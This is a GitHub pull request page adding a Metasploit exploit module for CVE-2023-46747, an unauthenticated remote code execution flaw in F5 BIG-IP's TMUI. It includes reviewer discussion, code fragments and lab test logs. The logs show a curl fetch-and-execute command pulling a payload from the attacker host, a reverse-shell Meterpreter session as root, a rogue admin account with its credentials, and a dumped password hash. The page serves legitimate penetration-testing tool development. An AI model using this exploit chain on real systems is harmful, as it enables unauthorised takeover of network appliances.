Add Exploit For CVE-2023-46747 (F5 TMUI AJP Smuggling RCE) #18497
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
zeroSteiner
changed the title
zeroSteiner
force-pushed
the
feat/mod/cve-2023-23747
branch
from
302d721 to
04388d9
Compare
jheysel-r7
reviewed
Oct 31, 2023
There was a problem hiding this comment.
Looking great so far. I know things are going to change so didn't review too thoroughly, just added one suggestion to make things run smoothly.
- BIGIP
16.1.2.1.-0.0.10-ALL-vmware(vulnerable target)
The module runs as expected and returns a root shell
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > run
[*] Command to run on remote host: curl -so /tmp/nUILTAOc http://192.168.123.1:8080/iWIVXt4sBwzVNa28qZFpsw; chmod +x /tmp/nUILTAOc; /tmp/nUILTAOc &
[*] Fetch Handler listening on 192.168.123.1:8080
[*] HTTP server started
[*] Adding resource /iWIVXt4sBwzVNa28qZFpsw
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] exploiting
[*] Sleeping for 2 seconds before attempting again
[+] Created administrator user: ahpYG:t4Sock4v2lCW
[*] Obtained login token: E5XEEVXNZMVFYPGRITLHXBJBPH
[*] Client 192.168.123.226 requested /iWIVXt4sBwzVNa28qZFpsw
[*] Sending payload to 192.168.123.226 (curl/7.47.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.123.226
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.226:58524) at 2023-10-31 12:36:41 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.3.1611 (Linux 3.10.0-862.14.4.el7.ve.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
- BIGIP
16.0.1-0.0.3.ALL-vmware(not vulnerable)
Affected versions in the 16.x range are: 16.1.0 - 16.1.4
I setup a patched target and figured I'd include the test results. Not sure how you plan on writing the check method, if version info isn't readily available this might be useful:
...
####################
# Request:
####################
PATCH /mgmt/shared/authz/users/epmEw HTTP/1.1
Host: 192.168.123.225
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Authorization: Basic ZXBtRXc6OGZYYVFqR3FOTmVt
Content-Type: application/json
Content-Length: 56
{"oldPassword":"8fXaQjGqNNem","password":"yAacbYs9nwDH"}
####################
# Response:
####################
HTTP/1.1 401 F5 Authorization Required
Date: Tue, 31 Oct 2023 16:06:07 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=16070400; includeSubDomains
Content-Length: 381
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested. Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
</body></html>
[*] Final attempt. Sleeping for the remaining 8 seconds out of total timeout 30
[-] Exploit aborted due to failure: unexpected-reply: Failed to change the password.
[*] Exploit completed, but no session was created.
modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
Outdated
Show resolved
Hide resolved
zeroSteiner
force-pushed
the
feat/mod/cve-2023-23747
branch
from
5b0ec94 to
9c67b92
Compare
jheysel-r7
reviewed
Nov 2, 2023
There was a problem hiding this comment.
Great changes, looking good. First try retesting the module I got a root session with no issues.
msf6 > use f5_bigip_tmui_rce_cve_2023_46747
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set rhosts 192.168.123.226
rhosts => 192.168.123.226
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set fetch_srvhost 192.168.123.1
fetch_srvhost => 192.168.123.1
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.123.226 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME DDzvzHPl no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST 192.168.123.1 no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[+] Admin user was created successfully. Credentials: XcHlOk - BPCJMuhJ9qRfu
[+] Retrieved the admin hash: $6$NXLmNels$bY88mPCfukgSQgUvUW.fiMla5o2K1/E02cONCZkP1nTUmftSkXI5lmj/rI4QccOkflWWKIOWFtn/n836hl4S00
[*] Obtained login token: U336NG3S7AHVJFEA2CHKTS5WEZ
[*] Sending stage (3045380 bytes) to 192.168.123.226
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.226:49036) at 2023-11-01 20:11:13 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.3.1611 (Linux 3.10.0-862.14.4.el7.ve.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.123.226 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.123.226:443 - The target is vulnerable.
modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
Outdated
Show resolved
Hide resolved
adfoster-r7
reviewed
Nov 2, 2023
| @@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote | |||
| include Msf::Exploit::Remote::HttpClient | |||
| include Msf::Exploit::CmdStager | |||
| include Msf::Exploit::FileDropper | |||
| include Msf::Exploit::Deprecated | |||
| moved_from 'exploit/linux/http/f5_bigip_tmui_rce' | |||
adfoster-r7
reviewed
Nov 2, 2023
adfoster-r7
reviewed
Nov 2, 2023
|
|
||
| require 'bindata' | ||
|
|
||
| # @see: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html |
There was a problem hiding this comment.
Not a blocker; Potentially putting a waybackmachine link here would help future travellers 👀
There was a problem hiding this comment.
adfoster-r7
reviewed
Nov 2, 2023
adfoster-r7
reviewed
Nov 2, 2023
modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
Outdated
Show resolved
Hide resolved
adfoster-r7
reviewed
Nov 2, 2023
| end | ||
|
|
||
| def check | ||
| res = create_user(role: 'Guest') |
There was a problem hiding this comment.
Not a blocker, I don't think this warrants requiring a defanged mode as it's going to create a user and leave it behind as a worse-case scenario which won't break any environments
adfoster-r7
reviewed
Nov 2, 2023
| end | ||
|
|
||
| def password | ||
| @password ||= Rex::Text.rand_text_alphanumeric(12..14) |
There was a problem hiding this comment.
Not a hard blocker, is it possible to use special characters here?
There was a problem hiding this comment.
I increased the size from 12..14 to 16..20. Special characters are a bit more complicated. After checking URI.encode_www_form, I only found two characters (.*) that do not get expanded to 3 characters. Because of the expansion, it's harder to guarantee that the password will fit within the allotted space.
[3] pry(#<Msf::Modules::Exploit__Linux__Http__F5_bigip_tmui_rce_cve_2023_46747::MetasploitModule>)> URI.encode_www_form('password' => 'FoO!@#$%^&*()~`{}|[]\:";<>?,./')
=> "password=FoO%21%40%23%24%25%5E%26*%28%29%7E%60%7B%7D%7C%5B%5D%5C%3A%22%3B%3C%3E%3F%2C.%2F"
The module is generally reliable, but may fail after it's been run multiple times.
|
Awesome job! Final testing output: 🚢 🚢 🚢 |
jheysel-r7
added
module
docs
rn-modules
Release NotesThis module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to execute a command payload. After the module is done, the new admin account is deleted. The standard REST APIs prevent a user from deleting themselves so the module leverages the vulnerability a second time to delete them while impersonating the admin user.
The existing
exploit/linux/http/f5_bigip_tmui_rcemodule was renamed toexploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902to clearly differentiate it from this module. There appears to be a precedence in the adjacent F5 modules to append the CVE to the end of the module name to clarify which vulnerability is being exploited.The AutoCheck mixin was not used because the check method creates a guest user and when the
AutoCheckmixin was present, this would break the exploit logic because the user didn't have the necessary privileges to execute the payload. If the check method created an Administrative user, then the AutoCheck mixin could be used. As it is now, there isn't an obvious way to have the check method create an Administrative user but only when called in the context of the exploit process. Accounting for theForceExploitandAutoCheckmethods would just complicate things.Testing
adminhash was saved to the databaseExample